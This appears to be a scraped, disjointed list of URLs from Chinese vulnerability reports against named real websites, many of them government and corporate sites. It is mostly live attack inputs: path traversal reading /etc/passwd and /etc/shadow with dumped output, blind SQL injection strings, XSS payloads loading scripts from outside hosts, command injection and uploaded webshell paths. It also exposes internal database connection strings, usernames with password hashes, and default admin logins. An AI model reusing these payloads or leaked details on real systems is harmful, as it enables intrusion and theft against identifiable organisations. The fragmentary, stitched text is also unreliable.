http://www.evergrandefs.com/DetailPage!lookTeachContent.htm?pageConId=100767%27&menuCode=127&menuLevel=3&url=DetailPage!lookTeachContent.htm http://xjd.tcl.com/jxscx.asp http://www.dgdianxin.com/ http://sd.189.cn/WEB-INF/classes/jdbc.properties http://sd.189.cn/WEB-INF/web.xml http://www.jmxinghua.com/news/index.asp http://api.t.sina.com.cn/oauth/authorize?oauth_token=94246086381d229991d4960d4f602ad1&oauth_callback=http%3A%2F%2Ftuchong.com%2Fbind%2F http://tuchong.com/bind/ http://api.t.sina.com.cn/oauth/authorize?oauth_token=d2437d0957de924e04cfa7f002665055&oauth_callback=http://wooyun.org http://wooyun.org,攻击者获取了用户的oauth_token和oauth_verifier后,就可通过http://tuchong.com/bind/?oauth_token=xx&oauth_verifier=xxx的形式登录用户帐号了。 https://221.202.118.50/admin/ids/waf_update.php http://mice.pudong.gov.cn/page/index.action http://www.imaidan.com/user-modify_password/code-6位数字验证码-id-用户id http://hdmv.app.56.com/web/getuserdata_56.asp?mvid=MTQ3NzE0IGhhdmluZyAxPTEtLQ== http://www.calis.edu.cn/educhina/viewnews.do?newsid=69 http://bbs.7k7k.com/images/default/logo.gif/a.php http://bbs.7k7k.com/memcp.php?action=profile&typeid=3 http://bbs.7k7k.com/uc_server_7k7k/admin.php?m=user&a=login&iframe=&sid= http://qingdao.imaidan.com/uc_account-save http://home.meishichina.com/event.php?classid=6 http://summit.ufida.com/ http://bbs.games.sina.com.cn/dingzhi/digest.php?bid=556&list=0,1,0,0,1&trnum=11&tdnum=1&hit=0&intime=1&strnum=24&namenum=5&datetype=2&dian=0&zidian=0&tp=0&reply=0&leixing=1&shijian=0 http://123.126.55.209:8000/ http://pinche.club.sohu.com/.svn/entries http://www.gzgwbn.com.cn/wwwroot.rar http://ask.imaidan.com/?/account/ajax/save_draft/item_id-653__type-answer http://xss.tw/989 
http://author.17k.com/author/addContractApply.action?contractApply.bookId=177707&contractApply.introduction=test%22%3E%3C%2Ftextarea%3E%3Cscript%20src%3Dhttp%3A%2F%2Fxss.sckxz.org%2Findex.php%2F211%3E%3C%2Fscript%3E&contractApply.relation=test%22%3E%3C%2Ftextarea%3E%3Cscript%20src%3Dhttp%3A%2F%2Fxss.sckxz.org%2Findex.php%2F211%3E%3C%2Fscript%3E&input01=0&struts.token=NYCOQB87ES822L9AEOMMPCQ0602SQNSG&struts.token.name=struts.token http://58.56.128.29/site2/ http://58.56.128.29/cms/ https://111.12.44.24/web/index.php https://111.1.1.119/web/index.php http://my.hupu.com/tools/bookmarklet.php http://www.scfs.gov.cn/webfront/html/article/201302281700010001.html http://www.scfs.gov.cn/article/loadArticleHtml.action?articleId=201302281700010001 http://202.102.108.47:8081/dxpt/ http://202.102.108.47:8081/dxpt/mainIndex.action http://www.imaidan.com/uc_topic-add?content=testcsrf http://cdyj.haier.com/Company/admin/ http://cdyj.haier.com/Company/admin/admin_template.asp?path=../template/../ URL:http://api.xinnet.com/domain/api.gb URL:http://api.xinnet.com/domain/api.gb?method=getTransoutPassword lexue.lenovo.com.cn/lms,登录后,个人信息处,照片上传。burp抓包,选择jsp文件,点击保存,burp未提示,网页弹出"照片格式错误",初步确定为本地js验证上传文件格式。 http://61.156.3.86 http://pay.duowan.com/showTempOrderDetail.action?depositOrderId=20130627215452T5K3U1IVTS http://www.mmclick.com/info/col.jsp?cid=7&row=1&page=1 http://ensupport.zte.com.cn/CSC/UILoader/Login.aspx http://survey.news.sina.com.cn/test.php http://roll.2008.sina.com.cn/test.php https://netlogin.sina.com.cn/ http://202.106.182.172/admin/blog/login.php http://www.yto.com.hk/ http://b131.demo.www.net.cn/admin/login.aspx http://freepp.10102020.net/wpb/ http://freepp.10102020.net/wpb/config.ini https://ecc.zte.com.cn/epm/uiloader/login.html http://online.suning.com/webchat/down.jsp?file=../../../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin 
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin snadmin:x:500:500::/home/snadmin:/bin/bash wcsuser:x:800:800::/home/wcsuser:/bin/bash http://wap.cmread.com/ http://wap.cmread.com/sso/oauth2/login?e_l=2&f=1767&pg= http://wap.cmread.com/sso/oauth2/smsResetPwd?txId=bdXXXXXXXXXXXXXXXXXXXXXXXXXXXX5d&msisdn=158XXXXXXXX http://china-qitc.sgepri.sgcc.com.cn/WaiShi.Aspx?item=0&txt= http://china-qitc.sgepri.sgcc.com.cn/WaiShi.Aspx?item=0&txt=1 
http://www.ahecs.gov.cn/plus/ http://www.ahecs.gov.cn/data/ http://www.qfkd.com.cn/ http://mediarank.sootoo.com/index.php/index/web_info/id/3 http://mediarank.sootoo.com/index.php/index/web_info?id=3 http://www.gpslh.com/ http://survey.game.renren.com/index.php?sid=33514 http://survey.game.renren.com/index.php?sid=33514%20and%20if%28ascii%28substring%28database%28%29,1,1%29%29=108,benchmark%20%28100000000,md5%281%29%29,1%29=1 http://survey.game.renren.com/index.php?sid=33514%20and%20if%28ascii%28substring%28user%28%29,2,1%29%29=111,benchmark http://survey.game.renren.com/index.php?sid=33514%20and%20if%28ascii%28substring%28database%28%29,3,1%29%29=109,benchmark%20%28100000000,md5%281%29%29,1%29=1//m http://survey.game.renren.com/index.php?sid=33514%20and%20if%28ascii%28substring%28database%28%29,4,1%29%29=101,benchmark%20%28100000000,md5%281%29%29,1%29=1//e http://survey.game.renren.com/index.php?sid=33514%20and%20if%28ascii%28substring%28database%28%29,5,1%29%29=115,benchmark%20%28100000000,md5%281%29%29,1%29=1//s http://survey.game.renren.com/index.php?sid=33514%20and%20if%28ascii%28substring%28database%28%29,6,1%29%29=117,benchmark%20%20%20%28100000000,md5%281%29%29,1%29=1//u http://survey.game.renren.com/index.php?sid=33514%20and%20if%28ascii%28substring%28database%28%29,7,1%29%29=114,benchmark%20%20%20%28100000000,md5%281%29%29,1%29=1//r http://survey.game.renren.com/index.php?sid=33514%20and%20if%28ascii%28substring%28database%28%29,8,1%29%29=118,benchmark%20%20%20%28100000000,md5%281%29%29,1%29=1//v http://survey.game.renren.com/index.php?sid=33514%20and%20if%28ascii%28substring%28database%28%29,9,1%29%29=101,benchmark%20%20%20%28100000000,md5%281%29%29,1%29=1//e http://survey.game.renren.com/index.php?sid=33514%20and%20if%28ascii%28substring%28database%28%29,10,1%29%29=121,benchmark%20%20%20%28100000000,md5%281%29%29,1%29=1 http://218.94.1.166/show.aspx http://218.94.1.166/TimeSupervise.aspx?deptId=1 http://www.imaidan.com/topic/id-7450 
http://58.213.19.150/123.jsp www.fardior.com,貌似打不开了已经。site:www.fardior.com WTUXmfO1:15775:0:180:7 http://58.213.19.5/info.php http://www.jnjj.com/jnjjwebnew/default.aspx http://www.jnjj.com/jnjjwebnew/Member/MemberDetailInfo.aspx?type=modify&id= http://61.145.73.214/index.asp http://211.138.211.130/ http://member.aili.com/?c=member&m=headImage&a=show http://luc.pw/ http://iask.sina.com.cn/search_engine/search_knowledge_engine.php?title=%2F%2F&key=%2F%2F&classid=0&gjss=0&vl=2&type=0&tag=0 http://www.pceggs.com/prize/chargeuserlist.aspx?issue=tfx-h0462%22/%3E%3Cscript%3Ealert%28%27www.anying.org%27%29%3C/script%3E http://www.pceggs.com/prize/prizebbs.aspx?issue=tfx-h0462%22/%3E%3Cscript%3Ealert%28%27www.anying.org%27%29%3C/script%3E http://www.pceggs.com/duobao/duobao_index.aspx?id=10001691%22/%3E%3Cscript%3Ealert%28%27www.anying.org%27%29%3C/script%3E http://www.pceggs.com/duobao/duobao_index.aspx?id=10001691%22/%3E%3Cscript%20src=http://x.co/16GzJ%3E%3C/script%3E ugc.renren.com/?author=1得到管理员用户名ugc-admin http://supplier.gome.com.cn/collectionOnDelivery/collectionOnDelivery_cashDailyMain.do http://www.chinaopenschool.com/gome/customize/nwc_user_cloud/login/login.html http://www3.zte.com.cn/datachange/file_upload.jsp?SelfControl=1&ShowText=1&AllowExt=rar,zip&InputName=&BgColor= http://www2.zte.com.cn/datachange/file_upload.jsp?SelfControl=1&ShowText=1&AllowExt=rar,zip&InputName=&BgColor= http://k.autohome.com.cn/form/carinput/edit/185651 http://i.autohome.com.cn/ajax/relations/addfollower?fuid=7905255 http://i.service.autohome.com.cn/clubapp/Message/SendMessage?txtName=nocar_guy&txtContent=test&ReturnType=3 http://3g.sina.com.cn/prog/wapsite/college/college.php?id=70162 3g.happigo.com/yijian.php m.happigo.com/user/myword.php http://m.happigo.com/help.php?search_key=&pno=2&uid=1286052&acckey=eQeFTlnkKzn91nqPAX15aSnOAf5xOwxf www.urlshare.cn等中间页面对某些可信域名是不做检查而做直接跳转的 http://b.wap.soso.com/qzone/detail.jsp?url=http%3A%2F%2Flvwei.me%2Fh%2fqs.php http://z.qq.com/?sid=盗来的sid 
http://wap.cmread.com/ http://wap.cmread.com/sso/oauth2/smsResetPwd?txId=64xxxxxxxxxxxxxxxxxxxx&msisdn=xxxxxxxxxxx m.happigo.com/user/login.php http://m.happigo.com/user/checkcode.php?code_id=16059 coding:utf-8-*- http://pkucio.baidu.com http://bolt.jebe.renren.com/bolt/member/city.htm?provinceCode=0086150000000000%27%20and%20if%28%281=2%29,1,%28select%201%20from%20mysql.user%29%29%20and%20%27%27=%27 http://bolt.jebe.renren.com/evol/campaign/getCampaignList.htm http://sop.suning.com/mer/member/pwdReset.htm http://www.super8.com.cn/mem/DeleteOrder.aspx?accid=56389006 http://ajax.club.autohome.com.cn/NewPost/Post?bbs=c&bbsId=2615&urlbbsId=2615&pvareaid=101465 http://ajax.club.autohome.com.cn/Post/TopicPost?topicid=0&tbbs=c&tbbsid=2615&urlbbsid=2615&fake_bbsid=0&tTitle=H2%2C%B4%F3%BC%D2%B6%BC%C0%B4%CB%B5%CB%B5%C4%DC%B5%C8%B4%FD%B5%C4%BC%AB%CF%DE%CA%B1%BC%E4%CA%C7%B6%E0%BE%C3&tRequestSource=AutohomeClub&log_id=&ATopicContent=%CE%D2%D5%E2%D1%F9%B5%C4%8C%C5%CB%BF%CF%D6%D4%DA%CE%DE%B4%E6%BF%EE%A3%AC%BB%B9%D3%D0%B7%BF%B4%FB%A3%AC%CB%F9%D2%D4%C4%DC%B9%BB%B5%C8%B4%FD%A3%AC%B2%BB%D6%AA%B5%C0%B4%F3%BC%D2%CA%C7%D4%F5%C3%B4%CF%EB%B5%C4%A3%AC%C0%B4%CB%B5%CB%B5%B0%C9%A3%A1%3Cimg+class%3D%22spic%22+src%3D%22http%3A%2F%2Fx.autoimg.cn%2Fclub%2FPost%2Fimg%2Fsmiles%2F43.gif%22%3E&tNotify=1 http://ajax.club.autohome.com.cn/Post/TopicPost?topicid=0&tbbs=c&tbbsid=2615&urlbbsid=2615&fake_bbsid=0 http://maillist.chinabyte.com/mail/login.jsp http://weblive.yesky.com/ http://admin.tianjimedia.com/jsp/system/index.jsp http://admin.tianjimedia.com/jsp/system/list.jsp http://admin.tianjimedia.com/jsp/system/input.jsp http://www.super8.com.cn/act/default.aspx?act=qunar http://www.966915.com/plugins/index.php?q=imgurl&url=QGltZ3VybEAvY29yZS9jb21tb24uaW5jLnBocA== www.966915.com?admin http://www.csxblyey.com/adminer.php http://club.sina.com.cn http://www.sgit.sgcc.com.cn/statistics/pma/index.php http://www.nvidia.cn/content/apac/employment/cn/job_mssql_cn.php 
http://125.93.53.13/UploadFile/thumb_6_6_.Php.JPG%20%20%20%20%20%20%20%20%20%20Php http://www.cuba.com.cn/htmain/index.php http://www.cuba.com.cn/cuba.rar http://www.hhsports.com.cn/plinfo.php http://www.super8.com.cn/act/Evip.aspx?act=sohuweibo http://yeyou.sdo.com/login.html admin:admin http://cu.17k.com/login.action http://plrg.nuaa.edu.cn http://idc.263.net/263/index.php?c=14 http://idc.263.net/263/admin/login.php http://idc.263.net/263/index.php?c=14 http://frt.7daysinn.cn:7700/TillSearch.aspx?BusinessDateStart=2013-7-1&BusinessDateEnd=2013-7-3&HotelID=1&HotelName=乌云店&UserID=84864&UserName=专业种田&WorkShiftID=0&WorkShiftTitle=乌云 http://inner.7daysinn.cn/BusinessRpt/ReportHelp.aspx?trackId=4b2fd8ed-221d-4483-8cc6-fa536f840a09 http://inner.7daysinn.cn/BusinessRpt/ReportHelp.aspx?trackId=4b2fd8ed-221d-4483-8cc6-fa536f840a09 http://zgqxbk.zqgame.com/Main/ListPage.aspx?type=news http://zgqx.zqgame.com/Main/Tutorial.aspx?type=actmess https://iaas.zqgame.com/ http://ty.zqgame.com/login.aspx http://kf.zqgame.com/admin/adminLogin.do http://www.changanfordclub.com/index.action http://login.sina.com.cn/cgi/login/logout.php,然后点击添加(需要抓包小小的改动一下,否则发不了文章) http://www.eastday.com/东方网新闻投稿 http://m.ctrip.com是针对用户用手机访问的,账号密码输入次数过多也不会锁定账号或者出现验证码。 https://ecp.sgcc.com.cn/BidUpgrade/SgccRecyclersModify?next=2 DATA:password=12345678&loginName=12345678 http://mgmt.motel168.com/ https://www.cmpassport.com/umc/reg/upgrade http://www.ccom.gov.cn/index.action www.super8.com.cn/B090/SpecialZoneList.aspx?city=1037&oid=591&sdate=1 http://cms.93.gov.cn:9091/app/vote/vote_form1_statistics.jsp?id=2070602421853087421 http://222.73.164.12:8081/jmx-console/ http://meishi.suning.com URL:http://59.cn/webhost/ajax.asp DATA:act=database&db=1&ptype= DATA2:act=webhost&host= http://sh.esf.sina.com.cn/uc_v1.php?id=editwantrent&bid=318 http://big5.mep.gov.cn/gate/big5/www.sepacec.com/apps/sepacec-tx/kind_search.php,点进去一看,直接显示源文件,如图所示 
http://big5.mep.gov.cn/gate/big5/www.sepacec.com/apps/sepacec-tx/db.php,猜猜看有什么 http://qq.8090.com/QQGroupInfo.aspx?id=14981,可入后台。 http://www.motel168.com/ShowHotelImage.aspx?type=1 http://company.zqgame.com/admin/index.html http://job.zqgame.com/admin/default.aspx http://en.zqgame.com/1.php http://beta.motel168.com/partner_info.html?proId=1 http://ch.smartdevices.com.cn/ http://idns.sfn.cn/viplogin/vipdomain_regDns.do http://idns.sfn.cn/system.jsp http://passport.blogbus.com/login_form?goto=http%3A%2F%2Fpassport.blogbus.com%2Fusers%2F http://www.ahwt.com.cn/ http://rr.mep.gov.cn/rsmsreq/ http://211.138.195.164/ http://i.pop.xdf.cn/zhuanti/13/zw/reg/wzdetail.asp?id=2 http://i.pop.xdf.cn/zhuanti/13/zw/reg/index.asp http://www.softto.com.cn/about.php?cid=1&id=10 http://qzone-music.qq.com/fcg-bin/fcg_music_fav_getinfo.fcg?dirinfo=1&dirid=201&uin=QQ号码&p=0.887586027616635&inCharset=GB2312&outCharset=utf-32&hostUin=¬ice=0&needNewCode=0&format=jsonp&platform=musicbox&jsonpCallback=jsonCallback http://cs.locojoy.com/ http://www.tudou.com/error.php?msg={xss http://try.women.sohu.com http://try.women.sohu.com/user/edit/24418 http://218.26.163.72/login.jsp http://121.35.251.51:80/zl/zmm.asp?button=%E6%8F%90%20%E4%BA%A4&button3=%E6%B8%85%20%E7%A9%BA&button21=%E8%BF%94%E5%9B%9E%E7%99%BB%E9%99%86&zmmzh=88888 http://b2b.airchn.com ftp://61.178.109.106/ http://www.midlele.com/forum/index.asp http://www.nyzw.gov.cn/common/common_info.action?wid=201110181532321003 http://www.sxrsj.gov.cn/admin/login.asp http://www.czjt.gov.cn/sofpro/gecs/questionnaire/web_list_yigediaocha.jsp?questionnaire_id=9 http://www.hnma.org.cn/hnma.rar http://oa.ztky.com/login.aspx?ReturnUrl=%2fuserNameLogin.aspx http://www.chekucafe.com/info.php http://brand.ellechina.com/index.php?cp=comments&eid=67&id=9388 http://makeup.ellechina.com/index.php?cp=searchlist&cid=1&bid=48 http://zyjd.post.gov.cn/scorequery/beforequery.jsp http://zyjd.post.gov.cn/scorequery/scoreaction!queryscore.action 
http://i.autohome.com.cn/i8001685 http://search.customs.gov.cn/dig/advsearch.action http://benpen.hualvtu.com/light.action?id=10130401191700002316 http://www.aqshbx.gov.cn/news.php?action=show&id=1672 http://www.aqshbx.gov.cn/news.php?action=show&id=1672 http://www.aqshbx.gov.cn/login.php http://xedkbm.smehen.gov.cn/111.rar http://gcjs.hnjs.gov.cn/ http://gcjs.hnjs.gov.cn/FCKeditor/editor/fckeditor.html http://dengfeng.hnjs.gov.cn/FCKeditor/editor/fckeditor.html http://gcjs.hnjs.gov.cn/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/aspx/connector.aspx http://www.hntxxh.cn/grsq.php http://my.ku6.com/ http://boke3.ku6.com/phpmyadmin/index.php http://giftour.ku6.com/test.php http://share.weiyun.com/49e7980c6e88e08a51c8ec8b98bfe197 view-source:http://share.weiyun.com/49e7980c6e88e08a51c8ec8b98bfe197 http://www.hntxxh.cn/yydt_show.php?id=44 http://www.hntxxh.cn/admin/ http://zu.soufun.com/rent/backstage/Delegate_Require/Delegate_Personal_Select.aspx http://www.dywlr.gov.cn/word-content_getWordContent.action?contentid=310220&source=showPointer http://220.191.210.54:8787/qlyg/bsdt/Com_register.do http://account.autohome.com.cn/login?backurl=http://www.baidu.com www.baidu.com http://admin.CBiween/backstage/login_framework.html http://58.83.206.138/wordtype/admin/ http://finance.sina.com.hk/cgi-bin/nw/main.cgi?cat=1571 http://updatenew.dedecms.com/base-v57/package/patch-v57&v57sp1-20130607.zip http://album.9you.com/conf/server.xml jdbc:oracle:thin:@192.168.0.229:1521:album jdbc:oracle:thin:@192.168.0.229:1521:gshop jdbc:oracle:thin:@192.168.0.229:1521:gdclandg jdbc:jtds:sqlserver://125.211.204.121:29806;DatabaseName=GDClan jdbc:jtds:sqlserver://125.211.204.121:29806;DatabaseName=GDCommon jdbc:jtds:sqlserver://125.211.204.121:29806;DatabaseName=GDStoreBilling jdbc:jtds:sqlserver://125.211.204.123:29806;DatabaseName=GOnlineGame jdbc:jtds:sqlserver://180.153.120.43:1433;DatabaseName=GDClan;SelectMethod=Cursor 
jdbc:jtds:sqlserver://180.153.120.43:1433;DatabaseName=GDCommon jdbc:jtds:sqlserver://180.153.120.43:1433;DatabaseName=GDStoreBilling jdbc:jtds:sqlserver://180.153.120.73:1433;DatabaseName=GOnlineGame jdbc:jtds:sqlserver://125.211.205.56:1433;DatabaseName=GDClan;SelectMethod=Cursor jdbc:jtds:sqlserver://125.211.205.56:1433;DatabaseName=GDCommon jdbc:jtds:sqlserver://125.211.205.56:1433;DatabaseName=GDStoreBilling jdbc:jtds:sqlserver://125.211.205.70:1433;DatabaseName=GOnlineGame jdbc:jtds:sqlserver://113.105.225.29:1433;DatabaseName=GDClan;SelectMethod=Cursor jdbc:jtds:sqlserver://113.105.225.29:1433;DatabaseName=GDCommon jdbc:jtds:sqlserver://113.105.225.29:1433;DatabaseName=GDStoreBilling jdbc:jtds:sqlserver://113.105.225.13:1433;DatabaseName=GOnlineGame jdbc:jtds:sqlserver://113.105.225.12:1433;DatabaseName=GDClan;SelectMethod=Cursor jdbc:jtds:sqlserver://113.105.225.12:1433;DatabaseName=GDCommon jdbc:jtds:sqlserver://113.105.225.12:1433;DatabaseName=GDStoreBilling jdbc:jtds:sqlserver://113.105.225.13:1433;DatabaseName=GOnlineGame http://bbs.9you.com/conf/server.xml jdbc:mysql://60.206.15.40:3306/common?characterEncoding=GBK jdbc:mysql://60.206.15.16:3306/common?characterEncoding=GBK jdbc:mysql://60.206.15.40:3306/forum2?characterEncoding=GBK jdbc:mysql://60.206.15.16:3306/forum2?characterEncoding=GBK jdbc:mysql://60.206.15.40:3306/forum1?characterEncoding=GBK jdbc:mysql://60.206.15.16:3306/forum1?characterEncoding=GBK http://gdclan.9you.com/conf/server.xml jdbc:oracle:thin:@192.168.0.229:1521:album jdbc:oracle:thin:@192.168.0.229:1521:gshop jdbc:oracle:thin:@192.168.0.229:1521:gdclandg jdbc:jtds:sqlserver://125.211.204.121:29806;DatabaseName=GDClan jdbc:jtds:sqlserver://125.211.204.121:29806;DatabaseName=GDCommon jdbc:jtds:sqlserver://125.211.204.121:29806;DatabaseName=GDStoreBilling jdbc:jtds:sqlserver://125.211.204.123:29806;DatabaseName=GOnlineGame jdbc:jtds:sqlserver://180.153.120.43:1433;DatabaseName=GDClan;SelectMethod=Cursor 
jdbc:jtds:sqlserver://180.153.120.43:1433;DatabaseName=GDCommon jdbc:jtds:sqlserver://180.153.120.43:1433;DatabaseName=GDStoreBilling jdbc:jtds:sqlserver://180.153.120.73:1433;DatabaseName=GOnlineGame jdbc:jtds:sqlserver://125.211.205.56:1433;DatabaseName=GDClan;SelectMethod=Cursor jdbc:jtds:sqlserver://125.211.205.56:1433;DatabaseName=GDCommon jdbc:jtds:sqlserver://125.211.205.56:1433;DatabaseName=GDStoreBilling jdbc:jtds:sqlserver://125.211.205.70:1433;DatabaseName=GOnlineGame jdbc:jtds:sqlserver://113.105.225.29:1433;DatabaseName=GDClan;SelectMethod=Cursor jdbc:jtds:sqlserver://113.105.225.29:1433;DatabaseName=GDCommon jdbc:jtds:sqlserver://113.105.225.29:1433;DatabaseName=GDStoreBilling jdbc:jtds:sqlserver://113.105.225.13:1433;DatabaseName=GOnlineGame jdbc:jtds:sqlserver://113.105.225.12:1433;DatabaseName=GDClan;SelectMethod=Cursor jdbc:jtds:sqlserver://113.105.225.12:1433;DatabaseName=GDCommon jdbc:jtds:sqlserver://113.105.225.12:1433;DatabaseName=GDStoreBilling jdbc:jtds:sqlserver://113.105.225.13:1433;DatabaseName=GOnlineGame http://gdclan.9you.com/admin/login.jsp http://www.gjxfj.gov.cn http://ts.gjxfj.gov.cn/login-do.pfv http://ts.gjxfj.gov.cn/admin/login-do.pfv http://ts.gjxfj.gov.cn/admin/tsbsys.jsp http://ts.gjxfj.gov.cn/common/html/upfile_table.htm Site:ts.gjxfj.gov.cn http://ts.gjxfj.gov.cn/downloadFile.pfv?domain=xffj&path=dfyjs&fileName=1daa0067-5ba4-11e1-8e4c-7bfd30aedc22.doc http://ts.gjxfj.gov.cn/downloadFile.pfv?domain=xffj&path=dfyjs&fileName=../../../../etc/passwd http://ts.gjxfj.gov.cn/downloadFile.pfv?domain=xffj&path=dfyjs&fileName=../../../../etc/shadow http://ts.gjxfj.gov.cn/downloadFile.pfv?domain=xffj&path=dfyjs&fileName=../../../../root/.bash_history http://ts.gjxfj.gov.cn/downloadFile.pfv?domain=xffj&path=dfyjs&fileName=../../../../opt/weblogic/user_projects/domains/jscxwebdomain/WebRoot20130628.tar 
http://ts.gjxfj.gov.cn/downloadFile.pfv?domain=xffj&path=dfyjs&fileName=../../../../opt/weblogic/user_projects/domains/jscxcoredomain//platform20130628.tar http://ts.gjxfj.gov.cn/downloadFile.pfv?domain=xffj&path=dfyjs&fileName=../../../../etc/hosts http://ts.gjxfj.gov.cn/downloadFile.pfv?domain=xffj&path=dfyjs&fileName=../../../../etc/issue http://sq.169ol.com/ http://119.6.119.40/umportal/RegisterWebServlet?method=getUserRegister&portalId=00&LoginSequenceID=26DTIx&goBackUrl=http://t.169ol.com/index_sql169ol_jump.php http://sq.169ol.com/user_tongbu.php?uid=&username=&jump_url=http://sq.169ol.com http://sq.169ol.com/user_tongbu.php?uid=1&username=abc&jump_url=http://sq.169ol.com http://www.film.cn/admin-console/ http://tiyan.baidu.com/index.php?r=user/profile http://xj.vae.ha.cn/ds/xb/bmb_detail.jsp?nr=2853 http://go108.astro.women.sohu.com/wish_tree_inputwish.php http://go108.astro.women.sohu.com/wish_tree_otherswish.php?id=25945 http://act.52pk.com/hd/ylzt9/welcome/get_paim?id=827590 http://act.52pk.com/hd/chinajoy2013/welcome/xs?id=8977775 http://www.unisk.cn/pro/province_order.asp http://www.lyhb.gov.cn/a.rar http://www.lyhb.gov.cn/plus/ http://www.lyhb.gov.cn/webadmin/ http://home.super8.com.cn/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=%2FFCKeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fasp%2Fconnector.asp http://home.super8.com.cn/fckeditor/editor/filemanager/connectors/test.html# http://digital.sina.com.hk/cgi-bin/pricelist/pricelisting.cgi?action=list&type=1&option=1&total=56&page=2 http://www.topunion.com.cn/www.rar http://myphoto.tech.sina.com.cn/ http://myphoto.tech.sina.com.cn/default.php?s=user&a=profile&uid=用户ID http://gongyi.eol.cn/helpdetail.php?id=69 http://huodong.xiaomi.com/microfilm/default/join http://system.greentree.com.cn:8080/op/Module_ERP/FCKeditor/editor/filemanager/browser/default/connectors/test.html# http://system.greentree.com.cn:8080/\op\Module_ERP\joinin\geling.aspx http://w.xdf.cn/user/login.php?uid=8060 
http://w.xdf.cn/ http://www.epailive.com/bottomAction_bottom_include.do?fileName=about.jsp http://myportal.super8.com.cn http://myportal.super8.com.cn/hr_admin/Upfile/1e1f1ef1-bd64-443c-846a-6a60b45fd3ff.pdf http://job.super8.com.cn/backend.php/interface/getdoc/?path=../../../../etc/passwd http://www.anta.com/hr/admin/admin_login.php site:fktong.com http://www.fktong.com/user/home.aspx?username=yxf2047&password=cb6a7f67e13987a http://www.fktong.com/user/home.aspx?username=q2861054&password=17edbf2655bf50a http://www.fktong.com/user/userpay.aspx?username=zhangyi&password=ab428a5cc35563e http://www.fktong.com/user/home.aspx?username=zhoulei2013&password=ab428a5cc35563e http://www.fktong.com/user/home.aspx?username=chongpan&password=ab428a5cc35563e http://www.fktong.com/user/home.aspx?username=fangchanmingmai&password=ab428a5cc35563e http://erp.998.com/ http://erp.998.com/web.rar Version:V5.0 http://mba.znufe.edu.cn/AdminManage/FileManagement/FileList.aspx?dir=D:\www.znmba.com\web_new\Upload\HtmlEditor\file\asp.asp http://mba.znufe.edu.cn/2013-7-5.rar http://mba.znufe.edu.cn/2013-1-31.rar http://mba.znufe.edu.cn/upfile.rar http://mba.znufe.edu.cn/Upload/HtmlEditor/file/asp.asp/1.jpg http://mba.znufe.edu.cn/Upload/HtmlEditor/file/asp.asp/1asp.jpg http://mba.znufe.edu.cn/Upload/HtmlEditor/file/asp.asp/asp.gif http://mba.znufe.edu.cn/Upload/HtmlEditor/file/asp.asp/asp.jpg http://mba.znufe.edu.cn//FCKeditor/editor/filemanager/browser/default/browser.html http://www.zkwo.com/ http://www.72z.org/ http://www.zhiweikeji.cn/ http://72z.org/support/s.aspx?p=这个我们加入'测试 http://ufsdp-borrow.ufsoft.com.cn/cmd.asp http://ufsdp-borrow.ufsoft.com.cn/1937cN.txt http://www.ahlib.com/ahlib/addcontent/webEditor/upload/files/file_down.jsp?filename=../../../../../../conf/tomcat-users.xml http://www.ahlib.com/manager/html http://220.181.26.232/stats/id;ls http://ufsdp-zjsj.ufida.com.cn/index.aspx http://ufsdp-zjsj.ufida.com.cn/files/ http://ufsdp-zjsj.ufida.com.cn/files/s.asp;.jpg 
http://j.esf.sina.com.cn/login/retrievepsd http://211.XX.XX.XXX http://yun.17186.cn/loginbypass.action http://yun.17186.cn/indexAction_index.action http://www.amazon.cn/%E5%AE%9E%E6%88%98%E7%B3%BB%E5%88%97-HTML-5%E4%B8%8ECSS-3%E6%9D%83%E5%A8%81%E6%8C%87%E5%8D%97-%E9%99%86%E5%87%8C%E7%89%9B/dp/product-description/B00BS58ZWQ/ref=dp_proddesc_0?ie=UTF8&s=books http://3g.youku.com/smartphone/login http://112.231.23.30:8080/ http://www.uftong.com/Admin/ManagerTestimony/ftb.image.aspx http://www.joyoland.com/article_cat.php?id=8 http://www.zyhycs.com/ http://www.zyhycs.com/activitiesinfo.jsp?classid=10&id=201306251216560001 http://www.zyhycs.com/background/ http://mep128.mofcom.gov.cn/mep/industry_OA/LOGIN.ASP http://aobo.tcl.com/leftjs.asp?id=42 